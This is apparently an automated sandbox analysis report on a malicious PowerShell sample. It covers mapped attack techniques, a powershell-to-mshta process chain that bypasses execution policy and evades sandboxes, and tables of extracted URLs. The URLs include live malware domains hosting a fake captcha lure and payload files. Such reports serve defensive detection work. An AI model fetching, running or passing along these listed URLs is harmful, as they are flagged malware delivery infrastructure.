Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 121 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 23 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Email Collection; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 1582960, Sample: 1.ps1, Startdate: 01/01/2025, Architecture: WINDOWS, Score: 84)
Contacted domains: deduhko.klipzyroloo.shop; solve.vwglq.com; deduhko2.kliphuwatey.shop
Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Sigma detected: Suspicious MSHTA Child Process; 3 other signatures
Process tree (each process started by its parent):
  powershell.exe: Suspicious powershell command line found; Bypasses PowerShell execution policy
    mshta.exe: Suspicious powershell command line found; network: deduhko.klipzyroloo.shop 188.114.97.3, 443, 49730, 49737 CLOUDFLARENETUS European Union; deduhko2.kliphuwatey.shop 172.67.144.62, 443, 49731 CLOUDFLARENETUS United States
      powershell.exe: Suspicious powershell command line found; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        powershell.exe
          conhost.exe
        conhost.exe
    conhost.exe
  svchost.exe: network: 127.0.0.1 unknown unknown
Source | Detection | Scanner | Label
1.ps1 | 0% | Virustotal |
1.ps1 | 0% | ReversingLabs |
No Antivirus matches
Source | Detection | Scanner | Label
https://solve.vw | 0% | Avira URL Cloud | safe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dV | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4/ | 0% | Avira URL Cloud | safe
https://deduhko.klipzyroloo.shop | 100% | Avira URL Cloud | malware
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dP | 0% | Avira URL Cloud | safe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dS | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4public | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4RRC: | 0% | Avira URL Cloud | safe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dl | 0% | Avira URL Cloud | safe
https://deduhko.kl | 0% | Avira URL Cloud | safe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dh | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Px& | 0% | Avira URL Cloud | safe
http://deduhko.klipzyroloo.shop | 100% | Avira URL Cloud | malware
https://deduhko2.kliphuwatey.shop/Poket.mp49280-654d-44b7-add6-a7ba0821d64d: | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4G | 0% | Avira URL Cloud | safe
https://deduhko.klipzyroloo.shop/mazkk.eml | 100% | Avira URL Cloud | malware
http://crl.microsoftvu | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4https://deduhko2.kliphuwatey.shop/Poket.mp4 | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp47 | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/ | 0% | Avira URL Cloud | safe
https://solve.vwX | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4n | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4...s | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4_ | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4Y | 0% | Avira URL Cloud | safe
https://solve.vwglq.com/Z | 0% | Avira URL Cloud | safe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d | 0% | Avira URL Cloud | safe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dC: | 0% | Avira URL Cloud | safe
https://solve.vwglq.com/R | 0% | Avira URL Cloud | safe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d. | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4... | 0% | Avira URL Cloud | safe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dlorerY) | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4w | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4LMEMX | 0% | Avira URL Cloud | safe
https://deduhko2.kliphuwatey.shop/Poket.mp4 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
deduhko2.kliphuwatey.shop | 172.67.144.62 | true | false | | high
solve.vwglq.com | 188.114.97.3 | true | false | | high
deduhko.klipzyroloo.shop | 188.114.97.3 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://deduhko.klipzyroloo.shop/mazkk.eml | true | Avira URL Cloud: malware | unknown
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d | true | Avira URL Cloud: safe | unknown
https://deduhko2.kliphuwatey.shop/Poket.mp4 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://solve.vw | powershell.exe, 00000000.00000002.1667002839.0000018B80530000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1667002839.0000018B804F4000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dS | mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dV | mshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://deduhko2.kliphuwatey.shop/Poket.mp4/ | mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dP | mshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://deduhko.kl | powershell.exe, 00000006.00000002.2214673362.0000000006CA6000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://deduhko2.kliphuwatey.shop/Poket.mp4RRC: | mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://deduhko.klipzyroloo.shop | powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.3.dr | false | | high
https://aka.ms/pscore6 | powershell.exe, 00000000.00000002.1667002839.0000018B80023000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://deduhko2.kliphuwatey.shop/Poket.mp4public | mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dl | mshta.exe, 00000002.00000002.1893706123.000001F01B450000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dh | mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://deduhko2.kliphuwatey.shop/Px& | mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod.C: | edb.log.3.dr | false | | high
https://g.live.com/odclientsettings/ProdV2 | edb.log.3.dr | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2183959871.0000000004561000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://deduhko2.kliphuwatey.shop/Poket.mp4G | mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1849792547.000001E5E9796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1849792547.000001E5E9654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://deduhko2.kliphuwatey.shop/ | mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://deduhko.klipzyroloo.shop | powershell.exe, 00000006.00000002.2183959871.0000000004A70000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://deduhko2.kliphuwatey.shop/Poket.mp49280-654d-44b7-add6-a7ba0821d64d: | mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1667002839.0000018B8009D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811581786.000001E5D95E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2183959871.0000000004561000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://deduhko2.kliphuwatey.shop/Poket.mp4https://deduhko2.kliphuwatey.shop/Poket.mp4 | mshta.exe, 00000002.00000003.1888626567.000001F822FF6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.microsoftvu | powershell.exe, 00000006.00000002.2182040392.000000000086A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://deduhko2.kliphuwatey.shop/Poket.mp47 | mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000003.00000003.1696559513.0000026275AD2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | false | | high
https://solve.vwX | powershell.exe, 00000000.00000002.1667002839.0000018B804F4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://deduhko2.kliphuwatey.shop/Poket.mp4n | mshta.exe, 00000002.00000002.1894476182.000001F81D6E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1849792547.000001E5E9796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1849792547.000001E5E9654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://deduhko2.kliphuwatey.shop/Poket.mp4...s | mshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://deduhko2.kliphuwatey.shop/Poket.mp4g | mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://solve.vwglq.com/R | mshta.exe, 00000002.00000003.1874624534.000001F01B4E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893892244.000001F01B4EA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.ver) | svchost.exe, 00000003.00000002.2901323035.0000026275800000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://deduhko2.kliphuwatey.shop/Poket.mp4_ | mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://deduhko2.kliphuwatey.shop/Poket.mp4Y | mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://solve.vwglq.com/Z | mshta.exe, 00000002.00000003.1874624534.000001F01B4E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893892244.000001F01B4EA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dC: | mshta.exe, 00000002.00000002.1893706123.000001F01B450000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d. | mshta.exe, 00000002.00000002.1893706123.000001F01B476000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://deduhko2.kliphuwatey.shop/Poket.mp4... | mshta.exe, 00000002.00000003.1877520508.000001F821E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1877800975.000001F821E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1895973024.000001F821E6D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
